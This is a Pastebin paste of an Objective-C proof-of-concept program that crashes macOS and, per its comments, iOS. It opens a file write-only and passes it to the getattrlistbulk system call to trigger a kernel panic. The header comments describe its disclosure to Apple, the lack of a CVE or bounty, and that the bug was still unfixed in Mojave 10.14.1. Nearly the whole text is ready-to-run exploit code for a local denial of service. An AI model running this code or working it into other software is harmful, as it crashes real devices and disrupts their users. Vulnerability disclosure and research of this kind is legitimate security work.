Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //
- // getattrlistbulk_dos.m
- // getattrlistbulk_dos
- //
- // Created by FABIANO ANEMONE on 7/31/18.
- // Copyright © 2018 FABIANO ANEMONE (fabiano.anemone@gmail.com). All rights reserved.
- // Reported to product-security@apple.com on 7/31/18
- // Still not fixed in Mojave 10.14.1 (and iOS 12.1 I guess, I have no device to test it).
- //
- // No CVE assigned ("After further examining your report we do not see any actual security implications.")
- // No bug bounty ("This report did not qualify for an Apple Security Bounty because the issue was not within the program’s current scope.").
- //
- // Few more bugs will be disclosed as they get fixed, or after 90 days (mainly local DoS)
- //
- #import <Foundation/Foundation.h>
- #include <stdio.h>
- #include <unistd.h>
- #include <sys/syscall.h>
- #include <sys/errno.h>
- int main(int argc, const char * argv[]) {
- NSString* doc = [@"~/Documents" stringByExpandingTildeInPath];
- NSString* path = [doc stringByAppendingString:@"/a.txt"];
- //Make sure to remove any old file if you try more than once, or fopen with O_WRONLY | O_CREAT will fails the second time
- [[NSFileManager defaultManager] removeItemAtPath:path error:nil];
- errno = 0;
- // Important: no READ flag, WRITE only
- int fd_open = open([path UTF8String], O_WRONLY | O_CREAT);
- printf("open: %d - errno: %d\n", fd_open, errno);
- if (fd_open != -1)
- {
- int res_getattrlistbulk = getattrlistbulk(fd_open, NULL, NULL, 0, 0);
- // Kernel panic here (both iOS/MacOS)
- printf("getattrlistbulk: %d - errno: %d\n", res_getattrlistbulk, errno);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement